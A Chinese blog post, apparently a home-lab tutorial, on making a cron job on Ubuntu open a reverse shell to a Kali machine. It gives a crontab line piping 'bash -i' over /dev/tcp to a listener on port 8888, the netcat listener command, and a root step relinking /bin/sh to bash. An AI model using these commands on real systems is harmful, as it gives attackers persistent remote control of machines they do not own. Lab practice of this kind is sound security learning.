实现Ubuntu计划任务的反弹shell

一、实验环境

Ubuntu:IP地址:192.168.223.156

Kali : IP地址:192.168.223.152

二、编写crontab计划任务

在Ubuntu的系统中使用crontab -e命令编写计划任务,如下所示:

作用:是将一个交互式的bash shell的输出和错误发送到kali的8888端口,并将输入也从该端口读取。

三、在kali中监听8888端口

nc -lp 8888

-l:代表开启监听

-p:代表指定端口号

结果发现,等了两三分钟,一点反应都没有,没收到返回的shell;

因此不得不在Ubuntu中查看它的日志,使用

tail -f /var/log/syslog查看

如图所示,出现了No MTA installed ,discarding output

该信息提示没有安装邮件服务MTA(因特网邮件传送代理;Mail Transfer Agent),因为cron的错误信息是通过邮件发送的,所以这应该不是报的错误,为了能够查看到到错误,可以采取以下措施:

使用crontab -e再次修改计划任务,使得错误信息能够输入到一个文件中,方便我们查看

bash 复制代码
* * * * * bash -i  '>& /dev/tcp/192.168.0.127/8888 0>&1'>/tmp/error.txt 2>&1

可以看到,不存在/bin/bash这个文件,或者说是没被找到,也就是说linux中cron的命令执行的shell环境是/bin/sh。查看后发现,sh是指向dash的软连接,由于dash的shell是没有交互能力的,所以要将sh的软链接修改为bash,注意要在root权限下进行修改!!!

bash 复制代码
ln - s -f bash /bin/sh

再次修改crontab计划

四、在kali上监听8888端口

可见远程成功,成功反弹shell!

总结:1.在编写crontab计划任务的时候要在root权限下进行编写

2.要将sh的软连接文件指向有交互性的bash上

相关推荐
不像程序员的程序媛2 小时前
系统cpu内存负载资源分析
运维·服务器·数据库
Uncertainty!!3 小时前
Ubuntu 22.04 安装超好用中文输入法rime-ice(雾凇拼音)过程记录
linux·ubuntu·中文输入法
ShineWinsu4 小时前
对于Linux:网络基础的解析
linux·网络·面试·udp·笔试·ip·tcp
Asuicao5 小时前
centos7.9版本升级ssh OpenSSH 9.8p1 源码 OpenSSL 1.1.1w 源码包以及安装升级回滚文档
运维·ssh
志栋智能5 小时前
超自动化安全中的威胁狩猎
运维·安全·自动化
↘"LYong6 小时前
旧版 CentOS 安装 Docker 完整指南(附国内镜像加速)
linux·运维·docker
Zhang~Ling6 小时前
Vim 多模式详解:命令、插入、底行与插件配置
linux·编辑器·vim
Elastic 中国社区官方博客6 小时前
Elastic 在 Everest Group 企业搜索产品 PEAK Matrix® 评估 2026 中被评为领导者
大数据·运维·人工智能·elasticsearch·搜索引擎·ai·全文检索
程序员在囧途6 小时前
likeadmin-api API 中转站怎么做统一报价?从 /pricing、/user/balance 到 task_id 回执的落地方法
运维·服务器·数据库·likeadmin-api·api中转站·token计费
想你依然心痛7 小时前
Linux用户空间与内核空间通信:netlink、ioctl、mmap 零拷贝与性能对比
linux·运维·服务器